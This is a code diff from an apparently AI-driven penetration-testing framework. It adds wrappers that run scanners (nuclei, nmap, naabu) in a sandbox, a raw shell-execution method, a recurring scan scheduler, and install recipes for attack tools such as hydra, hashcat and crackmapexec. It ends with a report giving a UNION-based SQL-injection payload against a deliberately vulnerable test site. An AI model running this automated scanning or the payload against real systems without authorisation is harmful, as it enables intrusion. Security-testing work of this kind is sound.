+            if len(stdout) > self.MAX_OUTPUT:
+                stdout = stdout[: self.MAX_OUTPUT] + "\n... [truncated]"
+            if len(stderr) > self.MAX_OUTPUT:
+                stderr = stderr[: self.MAX_OUTPUT] + "\n... [truncated]"
+
+            return SandboxResult(
+                tool="sandbox",
+                command=command,
+                exit_code=exec_result.exit_code,
+                stdout=stdout,
+                stderr=stderr,
+                duration_seconds=duration,
+            )
+
+        except Exception as e:
+            duration = (datetime.utcnow() - started).total_seconds()
+            return SandboxResult(
+                tool="sandbox", command=command, exit_code=-1,
+                stdout="", stderr="", duration_seconds=duration,
+                error=str(e),
+            )
+
+    # ------------------------------------------------------------------
+    # High-level tool APIs
+    # ------------------------------------------------------------------
+
+    async def run_nuclei(
+        self,
+        target: str,
+        templates: Optional[str] = None,
+        severity: Optional[str] = None,
+        tags: Optional[str] = None,
+        rate_limit: int = 150,
+        timeout: int = 600,
+    ) -> SandboxResult:
+        """
+        Run Nuclei vulnerability scanner against a target.
+
+        Args:
+            target: URL or host to scan
+            templates: Specific template path/ID (e.g., "cves/2024/")
+            severity: Filter by severity (critical,high,medium,low,info)
+            tags: Filter by tags (e.g., "xss,sqli,lfi")
+            rate_limit: Requests per second (default 150)
+            timeout: Max execution time in seconds
+        """
+        cmd_parts = [
+            "nuclei",
+            "-u", shlex.quote(target),
+            "-jsonl",
+            "-rate-limit", str(rate_limit),
+            "-silent",
+            "-no-color",
+        ]
+
+        if templates:
+            cmd_parts.extend(["-t", shlex.quote(templates)])
+        if severity:
+            cmd_parts.extend(["-severity", shlex.quote(severity)])
+        if tags:
+            cmd_parts.extend(["-tags", shlex.quote(tags)])
+
+        command = " ".join(cmd_parts) + " 2>/dev/null"
+        result = await self._exec(command, timeout=timeout)
+        result.tool = "nuclei"
+
+        # Parse findings
+        if result.stdout:
+            result.findings = parse_nuclei_jsonl(result.stdout)
+
+        return result
+
+    async def run_naabu(
+        self,
+        target: str,
+        ports: Optional[str] = None,
+        top_ports: Optional[int] = None,
+        scan_type: str = "s",
+        rate: int = 1000,
+        timeout: int = 300,
+    ) -> SandboxResult:
+        """
+        Run Naabu port scanner against a target.
+
+        Args:
+            target: IP address or hostname to scan
+            ports: Specific ports (e.g., "80,443,8080" or "1-65535")
+            top_ports: Use top N ports (e.g., 100, 1000)
+            scan_type: SYN (s), CONNECT (c)
+            rate: Packets per second
+            timeout: Max execution time in seconds
+        """
+        cmd_parts = [
+            "naabu",
+            "-host", shlex.quote(target),
+            "-json",
+            "-rate", str(rate),
+            "-silent",
+            "-no-color",
+        ]
+
+        if ports:
+            cmd_parts.extend(["-p", shlex.quote(ports)])
+        elif top_ports:
+            cmd_parts.extend(["-top-ports", str(top_ports)])
+        else:
+            cmd_parts.extend(["-top-ports", "1000"])
+
+        if scan_type:
+            cmd_parts.extend(["-scan-type", scan_type])
+
+        command = " ".join(cmd_parts) + " 2>/dev/null"
+        result = await self._exec(command, timeout=timeout)
+        result.tool = "naabu"
+
+        # Parse port findings
+        if result.stdout:
+            result.findings = parse_naabu_output(result.stdout)
+
+        return result
+
+    async def run_httpx(
+        self,
+        targets: List[str],
+        timeout: int = 120,
+    ) -> SandboxResult:
+        """
+        Run HTTPX for HTTP probing and tech detection.
+
+        Args:
+            targets: List of URLs/hosts to probe
+            timeout: Max execution time
+        """
+        target_str = "\\n".join(shlex.quote(t) for t in targets)
+        command = (
+            f'echo -e "{target_str}" | httpx -silent -json '
+            f'-title -tech-detect -status-code -content-length '
+            f'-follow-redirects -no-color 2>/dev/null'
+        )
+
+        result = await self._exec(command, timeout=timeout)
+        result.tool = "httpx"
+
+        # Parse JSON lines
+        if result.stdout:
+            findings = []
+            for line in result.stdout.strip().split("\n"):
+                try:
+                    data = json.loads(line)
+                    findings.append({
+                        "url": data.get("url", ""),
+                        "status_code": data.get("status_code", 0),
+                        "title": data.get("title", ""),
+                        "technologies": data.get("tech", []),
+                        "content_length": data.get("content_length", 0),
+                        "webserver": data.get("webserver", ""),
+                    })
+                except json.JSONDecodeError:
+                    continue
+            result.findings = findings
+
+        return result
+
+    async def run_subfinder(
+        self,
+        domain: str,
+        timeout: int = 120,
+    ) -> SandboxResult:
+        """
+        Run Subfinder for subdomain enumeration.
+
+        Args:
+            domain: Base domain to enumerate
+            timeout: Max execution time
+        """
+        command = f"subfinder -d {shlex.quote(domain)} -silent -no-color 2>/dev/null"
+        result = await self._exec(command, timeout=timeout)
+        result.tool = "subfinder"
+
+        if result.stdout:
+            subdomains = [s.strip() for s in result.stdout.strip().split("\n") if s.strip()]
+            result.findings = [{"subdomain": s} for s in subdomains]
+
+        return result
+
+    async def run_nmap(
+        self,
+        target: str,
+        ports: Optional[str] = None,
+        scripts: bool = True,
+        timeout: int = 300,
+    ) -> SandboxResult:
+        """
+        Run Nmap network scanner.
+
+        Args:
+            target: IP/hostname to scan
+            ports: Port specification
+            scripts: Enable default scripts (-sC)
+            timeout: Max execution time
+        """
+        cmd_parts = ["nmap", "-sV"]
+        if scripts:
+            cmd_parts.append("-sC")
+        if ports:
+            cmd_parts.extend(["-p", shlex.quote(ports)])
+        cmd_parts.extend(["-oN", "/dev/stdout", shlex.quote(target)])
+
+        command = " ".join(cmd_parts) + " 2>/dev/null"
+        result = await self._exec(command, timeout=timeout)
+        result.tool = "nmap"
+
+        return result
+
+    async def execute_raw(
+        self,
+        command: str,
+        timeout: int = DEFAULT_TIMEOUT,
+    ) -> SandboxResult:
+        """
+        Execute an arbitrary shell command inside the sandbox container.
+
+        Used by the Terminal Agent for interactive infrastructure testing.
+        Returns raw stdout/stderr/exit_code.
+
+        Args:
+            command: Shell command to execute (passed to sh -c)
+            timeout: Max execution time in seconds
+        """
+        result = await self._exec(f"sh -c {shlex.quote(command)}", timeout=timeout)
+        result.tool = "raw"
+        return result
+
+    async def run_tool(
+        self,
+        tool: str,
+        args: str,
+        timeout: int = DEFAULT_TIMEOUT,
+    ) -> SandboxResult:
+        """
+        Run any tool available in the sandbox.
+
+        Args:
+            tool: Tool name (nuclei, naabu, nmap, httpx, etc.)
+            args: Command-line arguments as string
+            timeout: Max execution time
+        """
+        # Validate tool is available
+        allowed_tools = {
+            "nuclei", "naabu", "nmap", "httpx", "subfinder", "katana",
+            "dnsx", "ffuf", "gobuster", "dalfox", "nikto", "sqlmap",
+            "whatweb", "curl", "dig", "whois", "masscan", "dirsearch",
+            "wfuzz", "arjun", "wafw00f", "waybackurls",
+        }
+
+        if tool not in allowed_tools:
+            return SandboxResult(
+                tool=tool, command=f"{tool} {args}", exit_code=-1,
+                stdout="", stderr="", duration_seconds=0,
+                error=f"Tool '{tool}' not in allowed list: {sorted(allowed_tools)}",
+            )
+
+        command = f"{tool} {args} 2>&1"
+        result = await self._exec(command, timeout=timeout)
+        result.tool = tool
+
+        return result
+
+    # ------------------------------------------------------------------
+    # Dynamic tool install / run / cleanup
+    # ------------------------------------------------------------------
+
+    async def install_tool(
+        self, tool: str, install_cmd: str = ""
+    ) -> Tuple[bool, str]:
+        """
+        Temporarily install a tool in the sandbox container.
+
+        Args:
+            tool: Tool name (must be in KNOWN_INSTALLS or provide install_cmd)
+            install_cmd: Custom install command (overrides KNOWN_INSTALLS)
+
+        Returns:
+            (success, message) tuple
+        """
+        if not self.is_available:
+            return False, "Sandbox not available"
+
+        cmd = install_cmd or self.KNOWN_INSTALLS.get(tool, "")
+        if not cmd:
+            return False, f"No install command for '{tool}'"
+
+        logger.info(f"Installing tool '{tool}' in sandbox...")
+        result = await self._exec(cmd, timeout=120)
+        success = result.exit_code == 0
+
+        if success:
+            self._temp_installed.add(tool)
+            logger.info(f"Tool '{tool}' installed successfully")
+        else:
+            logger.warning(f"Tool '{tool}' install failed: {result.stderr[:200]}")
+
+        msg = result.stdout[:500] if success else result.stderr[:500]
+        return success, msg
+
+    async def run_and_cleanup(
+        self,
+        tool: str,
+        args: str,
+        cleanup: bool = True,
+        timeout: int = 180,
+    ) -> SandboxResult:
+        """
+        Install tool if needed, run it, collect output, then cleanup.
+
+        This is the primary method for dynamic tool execution:
+        1. Check if tool exists in sandbox
+        2. Install if missing (from KNOWN_INSTALLS)
+        3. Run the tool with given arguments
+        4. Cleanup the installation if it was temporary
+
+        Args:
+            tool: Tool name
+            args: Command-line arguments
+            cleanup: Whether to remove temporarily installed tools
+            timeout: Max execution time in seconds
+
+        Returns:
+            SandboxResult with stdout, stderr, findings
+        """
+        if not self.is_available:
+            return SandboxResult(
+                tool=tool, command=f"{tool} {args}", exit_code=-1,
+                stdout="", stderr="", duration_seconds=0,
+                error="Sandbox not available",
+            )
+
+        # Check if tool exists
+        check = await self._exec(f"which {tool} 2>/dev/null")
+        if check.exit_code != 0:
+            # Try to install
+            ok, msg = await self.install_tool(tool)
+            if not ok:
+                return SandboxResult(
+                    tool=tool, command=f"{tool} {args}", exit_code=-1,
+                    stdout="", stderr=msg, duration_seconds=0,
+                    error=f"Install failed: {msg}",
+                )
+
+        # Run tool
+        result = await self.run_tool(tool, args, timeout=timeout)
+
+        # Cleanup if temporarily installed
+        if cleanup and tool in self._temp_installed:
+            logger.info(f"Cleaning up temporarily installed tool: {tool}")
+            await self._exec(
+                f"pip3 uninstall -y {shlex.quote(tool)} 2>/dev/null; "
+                f"gem uninstall -x {shlex.quote(tool)} 2>/dev/null; "
+                f"npm uninstall -g {shlex.quote(tool)} 2>/dev/null; "
+                f"rm -f $(which {shlex.quote(tool)}) 2>/dev/null",
+                timeout=30,
+            )
+            self._temp_installed.discard(tool)
+
+        return result
+
+    async def cleanup_temp_tools(self):
+        """Remove all temporarily installed tools."""
+        if not self._temp_installed:
+            return
+        for tool in list(self._temp_installed):
+            logger.info(f"Cleaning up temp tool: {tool}")
+            await self._exec(
+                f"pip3 uninstall -y {shlex.quote(tool)} 2>/dev/null; "
+                f"gem uninstall -x {shlex.quote(tool)} 2>/dev/null; "
+                f"npm uninstall -g {shlex.quote(tool)} 2>/dev/null; "
+                f"rm -f $(which {shlex.quote(tool)}) 2>/dev/null",
+                timeout=30,
+            )
+            self._temp_installed.discard(tool)
+
+
+# ---------------------------------------------------------------------------
+# Global singleton
+# ---------------------------------------------------------------------------
+
+_manager: Optional[SandboxManager] = None
+
+# Alias for backward compatibility
+LegacySandboxManager = SandboxManager
+
+
+async def get_sandbox(scan_id: Optional[str] = None) -> BaseSandbox:
+    """Get a sandbox instance.
+
+    Args:
+        scan_id: If provided, returns a per-scan KaliSandbox from the container pool.
+                 If None, returns the legacy shared SandboxManager.
+
+    Backward compatible: all existing callers use get_sandbox() with no args.
+    Agent passes scan_id for per-scan container isolation.
+    """
+    if scan_id is not None:
+        try:
+            from core.container_pool import get_pool
+            pool = get_pool()
+            return await pool.get_or_create(scan_id)
+        except Exception as e:
+            logger.warning(f"Per-scan sandbox failed ({e}), falling back to shared")
+            # Fall through to legacy
+
+    # Legacy path: shared persistent container
+    global _manager
+    if _manager is None:
+        _manager = SandboxManager()
+        ok, msg = await _manager.initialize()
+        if not ok:
+            logger.warning(f"Sandbox initialization: {msg}")
+    return _manager
diff --git a/core/scheduler.py b/core/scheduler.py
new file mode 100644
index 0000000..21804db
--- /dev/null
+++ b/core/scheduler.py
@@ -0,0 +1,219 @@
+#!/usr/bin/env python3
+"""
+Scan Scheduler - Recurring task orchestration for NeuroSploit.
+
+Supports cron expressions and interval-based scheduling for:
+- Reconnaissance scans
+- Vulnerability validation
+- Re-analysis of previous findings
+
+Uses APScheduler with SQLite persistence so jobs survive restarts.
+"""
+
+import json
+import logging
+from datetime import datetime
+from typing import Dict, List, Optional
+from pathlib import Path
+
+logger = logging.getLogger(__name__)
+
+try:
+    from apscheduler.schedulers.asyncio import AsyncIOScheduler
+    from apscheduler.triggers.cron import CronTrigger
+    from apscheduler.triggers.interval import IntervalTrigger
+    from apscheduler.jobstores.sqlalchemy import SQLAlchemyJobStore
+    HAS_APSCHEDULER = True
+except ImportError:
+    HAS_APSCHEDULER = False
+    logger.warning("APScheduler not installed. Scheduler disabled. Install with: pip install apscheduler>=3.10.0")
+
+
+class ScanScheduler:
+    """Manages recurring scan jobs via APScheduler."""
+
+    def __init__(self, config: Dict, database_url: str = "sqlite:///./data/neurosploit_scheduler.db"):
+        self.config = config
+        self.scheduler_config = config.get('scheduler', {})
+        self.enabled = self.scheduler_config.get('enabled', False)
+        self.jobs_meta: Dict[str, Dict] = {}  # job_id -> metadata
+        self._scan_callback = None
+
+        if not HAS_APSCHEDULER:
+            self.enabled = False
+            self.scheduler = None
+            return
+
+        jobstores = {
+            'default': SQLAlchemyJobStore(url=database_url)
+        }
+        self.scheduler = AsyncIOScheduler(jobstores=jobstores)
+
+        # Load pre-configured jobs from config
+        for job_config in self.scheduler_config.get('jobs', []):
+            try:
+                self.add_job(
+                    job_id=job_config['id'],
+                    target=job_config['target'],
+                    scan_type=job_config.get('scan_type', 'quick'),
+                    cron_expression=job_config.get('cron'),
+                    interval_minutes=job_config.get('interval_minutes'),
+                    agent_role=job_config.get('agent_role'),
+                    llm_profile=job_config.get('llm_profile')
+                )
+            except Exception as e:
+                logger.error(f"Failed to load scheduled job '{job_config.get('id', '?')}': {e}")
+
+    def set_scan_callback(self, callback):
+        """Set the callback function that executes scans.
+
+        The callback signature should be:
+            async def callback(target: str, scan_type: str,
+                             agent_role: Optional[str], llm_profile: Optional[str]) -> Dict
+        """
+        self._scan_callback = callback
+
+    def add_job(self, job_id: str, target: str, scan_type: str = "quick",
+                cron_expression: Optional[str] = None,
+                interval_minutes: Optional[int] = None,
+                agent_role: Optional[str] = None,
+                llm_profile: Optional[str] = None) -> Dict:
+        """Schedule a recurring scan job.
+
+        Args:
+            job_id: Unique identifier for the job
+            target: Target URL or IP
+            scan_type: 'quick', 'full', 'recon', or 'analysis'
+            cron_expression: Cron schedule (e.g., '0 */6 * * *' for every 6 hours)
+            interval_minutes: Alternative to cron - run every N minutes
+            agent_role: Optional agent role for AI analysis
+            llm_profile: Optional LLM profile override
+        """
+        if not self.scheduler:
+            return {"error": "Scheduler not available (APScheduler not installed)"}
+
+        if cron_expression:
+            trigger = CronTrigger.from_crontab(cron_expression)
+            schedule_desc = f"cron: {cron_expression}"
+        elif interval_minutes:
+            trigger = IntervalTrigger(minutes=interval_minutes)
+            schedule_desc = f"every {interval_minutes} minutes"
+        else:
+            return {"error": "Provide either cron_expression or interval_minutes"}
+
+        self.scheduler.add_job(
+            self._execute_scheduled_scan,
+            trigger=trigger,
+            id=job_id,
+            args=[target, scan_type, agent_role, llm_profile],
+            replace_existing=True,
+            name=f"scan_{target}_{scan_type}"
+        )
+
+        meta = {
+            "id": job_id,
+            "target": target,
+            "scan_type": scan_type,
+            "schedule": schedule_desc,
+            "agent_role": agent_role,
+            "llm_profile": llm_profile,
+            "created_at": datetime.now().isoformat(),
+            "last_run": None,
+            "run_count": 0,
+            "status": "active"
+        }
+        self.jobs_meta[job_id] = meta
+
+        logger.info(f"Scheduled job '{job_id}': {target} ({scan_type}) - {schedule_desc}")
+        return meta
+
+    def remove_job(self, job_id: str) -> bool:
+        """Remove a scheduled job."""
+        if not self.scheduler:
+            return False
+        try:
+            self.scheduler.remove_job(job_id)
+            self.jobs_meta.pop(job_id, None)
+            logger.info(f"Removed scheduled job: {job_id}")
+            return True
+        except Exception as e:
+            logger.error(f"Failed to remove job '{job_id}': {e}")
+            return False
+
+    def pause_job(self, job_id: str) -> bool:
+        """Pause a scheduled job."""
+        if not self.scheduler:
+            return False
+        try:
+            self.scheduler.pause_job(job_id)
+            if job_id in self.jobs_meta:
+                self.jobs_meta[job_id]["status"] = "paused"
+            return True
+        except Exception as e:
+            logger.error(f"Failed to pause job '{job_id}': {e}")
+            return False
+
+    def resume_job(self, job_id: str) -> bool:
+        """Resume a paused job."""
+        if not self.scheduler:
+            return False
+        try:
+            self.scheduler.resume_job(job_id)
+            if job_id in self.jobs_meta:
+                self.jobs_meta[job_id]["status"] = "active"
+            return True
+        except Exception as e:
+            logger.error(f"Failed to resume job '{job_id}': {e}")
+            return False
+
+    def list_jobs(self) -> List[Dict]:
+        """List all scheduled jobs with metadata."""
+        jobs = []
+        if self.scheduler:
+            for job in self.scheduler.get_jobs():
+                meta = self.jobs_meta.get(job.id, {})
+                jobs.append({
+                    "id": job.id,
+                    "name": job.name,
+                    "next_run": str(job.next_run_time) if job.next_run_time else None,
+                    "target": meta.get("target", "unknown"),
+                    "scan_type": meta.get("scan_type", "unknown"),
+                    "schedule": meta.get("schedule", "unknown"),
+                    "status": meta.get("status", "active"),
+                    "last_run": meta.get("last_run"),
+                    "run_count": meta.get("run_count", 0)
+                })
+        return jobs
+
+    async def _execute_scheduled_scan(self, target: str, scan_type: str,
+                                       agent_role: Optional[str],
+                                       llm_profile: Optional[str]):
+        """Execute a scheduled scan. Called by APScheduler."""
+        job_id = f"scan_{target}_{scan_type}"
+        logger.info(f"Executing scheduled scan: {target} ({scan_type})")
+
+        if job_id in self.jobs_meta:
+            self.jobs_meta[job_id]["last_run"] = datetime.now().isoformat()
+            self.jobs_meta[job_id]["run_count"] += 1
+
+        if self._scan_callback:
+            try:
+                result = await self._scan_callback(target, scan_type, agent_role, llm_profile)
+                logger.info(f"Scheduled scan completed: {target} ({scan_type})")
+                return result
+            except Exception as e:
+                logger.error(f"Scheduled scan failed for {target}: {e}")
+        else:
+            logger.warning("No scan callback registered. Scheduled scan skipped.")
+
+    def start(self):
+        """Start the scheduler."""
+        if self.scheduler and self.enabled:
+            self.scheduler.start()
+            logger.info(f"Scheduler started with {len(self.list_jobs())} jobs")
+
+    def stop(self):
+        """Stop the scheduler gracefully."""
+        if self.scheduler and self.scheduler.running:
+            self.scheduler.shutdown(wait=False)
+            logger.info("Scheduler stopped")
diff --git a/core/tool_registry.py b/core/tool_registry.py
new file mode 100644
index 0000000..27a50b6
--- /dev/null
+++ b/core/tool_registry.py
@@ -0,0 +1,110 @@
+"""
+NeuroSploit v3 - Tool Installation Registry for Kali Containers
+
+Maps tool names to installation commands that work inside kalilinux/kali-rolling.
+Tools grouped by method: pre-installed (base image), apt (Kali repos), go install, pip.
+"""
+
+from typing import Optional, Dict
+
+
+class ToolRegistry:
+    """Registry of tool installation recipes for Kali sandbox containers."""
+
+    # Tools pre-installed in Dockerfile.kali (no install needed)
+    PRE_INSTALLED = {
+        # Go tools (pre-compiled in builder stage)
+        "nuclei", "naabu", "httpx", "subfinder", "katana", "dnsx",
+        "uncover", "ffuf", "gobuster", "dalfox", "waybackurls",
+        # APT tools (pre-installed in runtime stage)
+        "nmap", "nikto", "sqlmap", "masscan", "whatweb",
+        # System tools
+        "curl", "wget", "git", "python3", "pip3", "go",
+        "jq", "dig", "whois", "openssl", "netcat", "bash",
+    }
+
+    # APT packages available in Kali repos (on-demand, not pre-installed)
+    APT_TOOLS: Dict[str, str] = {
+        "wpscan":      "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq wpscan",
+        "dirb":        "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq dirb",
+        "hydra":       "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq hydra",
+        "john":        "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq john",
+        "hashcat":     "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq hashcat",
+        "testssl":     "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq testssl.sh",
+        "testssl.sh":  "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq testssl.sh",
+        "sslscan":     "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq sslscan",
+        "enum4linux":  "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq enum4linux",
+        "nbtscan":     "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq nbtscan",
+        "dnsrecon":    "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq dnsrecon",
+        "fierce":      "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq fierce",
+        "amass":       "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq amass",
+        "responder":   "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq responder",
+        "medusa":      "apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq medusa",
+        "crackmapexec":"apt-get update -qq && DEBIAN_FRONTEND=noninteractive apt-get install -y -qq crackmapexec",
+    }
+
+    # Go tools installed via `go install` (on-demand, not pre-compiled)
+    GO_TOOLS: Dict[str, str] = {
+        "gau":          "github.com/lc/gau/v2/cmd/gau@latest",
+        "gitleaks":     "github.com/gitleaks/gitleaks/v8@latest",
+        "anew":         "github.com/tomnomnom/anew@latest",
+        "httprobe":     "github.com/tomnomnom/httprobe@latest",
+    }
+
+    # Python tools via pip
+    PIP_TOOLS: Dict[str, str] = {
+        "dirsearch": "pip3 install --no-cache-dir --break-system-packages dirsearch",
+        "wfuzz":     "pip3 install --no-cache-dir --break-system-packages wfuzz",
+        "arjun":     "pip3 install --no-cache-dir --break-system-packages arjun",
+        "wafw00f":   "pip3 install --no-cache-dir --break-system-packages wafw00f",
+        "sslyze":    "pip3 install --no-cache-dir --break-system-packages sslyze",
+        "commix":    "pip3 install --no-cache-dir --break-system-packages commix",
+        "trufflehog":"pip3 install --no-cache-dir --break-system-packages trufflehog",
+        "retire":    "pip3 install --no-cache-dir --break-system-packages retirejs",
+    }
+
+    def get_install_command(self, tool: str) -> Optional[str]:
+        """Get the install command for a tool inside a Kali container.
+
+        Returns None if the tool is pre-installed or unknown.
+        """
+        if tool in self.PRE_INSTALLED:
+            return None  # Already available
+
+        if tool in self.APT_TOOLS:
+            return self.APT_TOOLS[tool]
+
+        if tool in self.GO_TOOLS:
+            go_pkg = self.GO_TOOLS[tool]
+            return (
+                f"export GOPATH=/root/go && export PATH=$PATH:/root/go/bin && "
+                f"go install -v {go_pkg} && "
+                f"cp /root/go/bin/{tool} /usr/local/bin/ 2>/dev/null || true"
+            )
+
+        if tool in self.PIP_TOOLS:
+            return self.PIP_TOOLS[tool]
+
+        return None
+
+    def is_known(self, tool: str) -> bool:
+        """Check if we have a recipe for this tool."""
+        return (
+            tool in self.PRE_INSTALLED
+            or tool in self.APT_TOOLS
+            or tool in self.GO_TOOLS
+            or tool in self.PIP_TOOLS
+        )
+
+    def all_tools(self) -> Dict[str, str]:
+        """Return all known tools and their install method."""
+        result = {}
+        for t in self.PRE_INSTALLED:
+            result[t] = "pre-installed"
+        for t in self.APT_TOOLS:
+            result[t] = "apt"
+        for t in self.GO_TOOLS:
+            result[t] = "go"
+        for t in self.PIP_TOOLS:
+            result[t] = "pip"
+        return result
diff --git a/data/reports/report_20260209_001839/report_20260209_001839.html b/data/reports/report_20260209_001839/report_20260209_001839.html
new file mode 100644
index 0000000..add83fa
--- /dev/null
+++ b/data/reports/report_20260209_001839/report_20260209_001839.html
@@ -0,0 +1,1365 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+    <meta charset="UTF-8">
+    <meta name="viewport" content="width=device-width, initial-scale=1.0">
+    <title>Security Assessment Report - AI Agent: auto_pentest - http://testphp.vulnweb.com/</title>
+    <style>
+        :root {
+            --bg-primary: #1a1a2e;
+            --bg-secondary: #16213e;
+            --bg-card: #0f3460;
+            --text-primary: #eee;
+            --text-secondary: #aaa;
+            --accent: #e94560;
+            --border: #333;
+        }
+        * { box-sizing: border-box; margin: 0; padding: 0; }
+        body {
+            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, sans-serif;
+            background: var(--bg-primary);
+            color: var(--text-primary);
+            line-height: 1.6;
+        }
+        .container { max-width: 1200px; margin: 0 auto; padding: 20px; }
+        .header {
+            background: linear-gradient(135deg, var(--bg-secondary), var(--bg-card));
+            padding: 40px;
+            border-radius: 10px;
+            margin-bottom: 30px;
+            text-align: center;
+        }
+        .header h1 { color: var(--accent); margin-bottom: 10px; }
+        .header p { color: var(--text-secondary); }
+        .stats-grid {
+            display: grid;
+            grid-template-columns: repeat(auto-fit, minmax(150px, 1fr));
+            gap: 20px;
+            margin-bottom: 30px;
+        }
+        .stat-card {
+            background: var(--bg-card);
+            padding: 20px;
+            border-radius: 10px;
+            text-align: center;
+        }
+        .stat-card .number { font-size: 2em; font-weight: bold; }
+        .stat-card .label { color: var(--text-secondary); font-size: 0.9em; }
+        .section { background: var(--bg-secondary); padding: 30px; border-radius: 10px; margin-bottom: 30px; }
+        .section h2 { color: var(--accent); margin-bottom: 20px; border-bottom: 2px solid var(--border); padding-bottom: 10px; }
+        .vuln-card {
+            background: var(--bg-card);
+            border-radius: 10px;
+            margin-bottom: 20px;
+            overflow: hidden;
+        }
+        .vuln-header {
+            padding: 20px;
+            display: flex;
+            align-items: center;
+            gap: 15px;
+            border-bottom: 1px solid var(--border);
+        }
+        .vuln-header h3 { flex: 1; }
+        .severity-badge {
+            padding: 5px 15px;
+            border-radius: 20px;
+            color: white;
+            font-weight: bold;
+            font-size: 0.8em;
+        }
+        .vuln-meta {
+            padding: 10px 20px;
+            background: rgba(0,0,0,0.2);
+            display: flex;
+            gap: 20px;
+            flex-wrap: wrap;
+            font-size: 0.9em;
+        }
+        .vuln-body { padding: 20px; }
+        .vuln-body p { margin-bottom: 15px; }
+        .poc-section, .remediation-section {
+            margin-top: 20px;
+            padding-top: 20px;
+            border-top: 1px solid var(--border);
+        }
+        .poc-section h4, .remediation-section h4 { color: var(--accent); margin-bottom: 10px; }
+        .code-block {
+            background: #0a0a15;
+            border-radius: 5px;
+            padding: 15px;
+            overflow-x: auto;
+            margin-top: 10px;
+        }
+        .code-block pre {
+            font-family: 'Monaco', 'Menlo', monospace;
+            font-size: 0.85em;
+            white-space: pre-wrap;
+            word-wrap: break-word;
+        }
+        .executive-summary { white-space: pre-wrap; }
+        .ohvr-section {
+            margin: 1rem 0;
+            padding: 1rem;
+            background: rgba(0,0,0,0.2);
+            border-radius: 8px;
+        }
+        .ohvr-section h5 {
+            color: var(--accent);
+            margin-bottom: 0.5rem;
+            text-transform: uppercase;
+            font-size: 0.8rem;
+            letter-spacing: 1px;
+        }
+        .screenshot-grid {
+            display: grid;
+            grid-template-columns: repeat(auto-fit, minmax(300px, 1fr));
+            gap: 1rem;
+            margin: 1rem 0;
+        }
+        .screenshot-card {
+            border: 1px solid var(--border);
+            border-radius: 8px;
+            overflow: hidden;
+        }
+        .screenshot-card img {
+            width: 100%;
+            height: auto;
+            display: block;
+        }
+        .screenshot-caption {
+            padding: 0.5rem;
+            font-size: 0.8rem;
+            color: var(--text-secondary);
+            text-align: center;
+        }
+        .severity-chart {
+            display: flex;
+            height: 30px;
+            border-radius: 5px;
+            overflow: hidden;
+            margin-top: 20px;
+        }
+        .severity-bar { display: flex; align-items: center; justify-content: center; color: white; font-size: 0.8em; font-weight: bold; }
+        .footer { text-align: center; padding: 20px; color: var(--text-secondary); font-size: 0.9em; }
+    </style>
+</head>
+<body>
+    <div class="container">
+        <div class="header">
+            <h1>NeuroSploit Security Report</h1>
+            <p>Security Assessment Report - AI Agent: auto_pentest - http://testphp.vulnweb.com/</p>
+            <p>Generated: 2026-02-09 00:18:39</p>
+        </div>
+
+        <div class="stats-grid">
+            <div class="stat-card">
+                <div class="number" style="color: #dc3545">1</div>
+                <div class="label">Critical</div>
+            </div>
+            <div class="stat-card">
+                <div class="number" style="color: #fd7e14">3</div>
+                <div class="label">High</div>
+            </div>
+            <div class="stat-card">
+                <div class="number" style="color: #ffc107">13</div>
+                <div class="label">Medium</div>
+            </div>
+            <div class="stat-card">
+                <div class="number" style="color: #17a2b8">1</div>
+                <div class="label">Low</div>
+            </div>
+            <div class="stat-card">
+                <div class="number">20</div>
+                <div class="label">Total</div>
+            </div>
+        </div>
+
+        <div class="section">
+            <h2>Executive Summary</h2>
+            <p class="executive-summary">A security assessment was conducted on the target application.
+The assessment identified 20 vulnerabilities across the tested endpoints.
+
+Risk Summary:
+- Critical: 1
+- High: 3
+- Medium: 13
+- Low: 1
+
+Overall Risk Level: Critical
+
+Immediate attention is required to address critical and high severity findings.
+</p>
+        </div>
+
+        <div class="section">
+            <h2>Vulnerability Findings</h2>
+            
+            <div class="vuln-card">
+                <div class="vuln-header">
+                    <span class="severity-badge" style="background-color: #dc3545;">CRITICAL</span>
+                    <h3>Union-based SQL Injection</h3>
+                </div>
+                <div class="vuln-meta">
+                    <span><strong>Type:</strong> sqli_union</span>
+                    <span><strong>CWE:</strong> CWE-89</span>
+                    <span><strong>CVSS:</strong> 9.8</span>
+                </div>
+                <div class="vuln-body">
+                    <p><strong>Affected Endpoint:</strong> http://testphp.vulnweb.com/listproducts.php?cat=&#39;+UNION+SELECT+NULL--</p>
+                    <p><strong>Description:</strong> A Union-based SQL injection vulnerability was identified in the listproducts.php endpoint of the target application. The vulnerability exists in the &#39;cat&#39; parameter, which is directly incorporated into SQL queries without proper sanitization or parameterization. During testing, the payload &#39; UNION SELECT NULL-- was successfully injected, triggering distinct SQL error messages that confirmed the presence of the vulnerability.
+
+Union-based SQL injection attacks exploit improperly sanitized user input to manipulate SQL queries by injecting UNION statements. This technique allows attackers to combine results from the original query with results from attacker-controlled queries, enabling data extraction from arbitrary database tables. The observed error patterns indicate that the application is directly concatenating user input into SQL statements, creating a classic injection point.
+
+In this specific context, the cat parameter appears to be used for filtering product categories, likely through a WHERE clause in the underlying SQL query. The successful injection of the UNION SELECT payload demonstrates that an attacker can break out of the original query context and execute arbitrary SQL commands with the same privileges as the application&#39;s database user.</p>
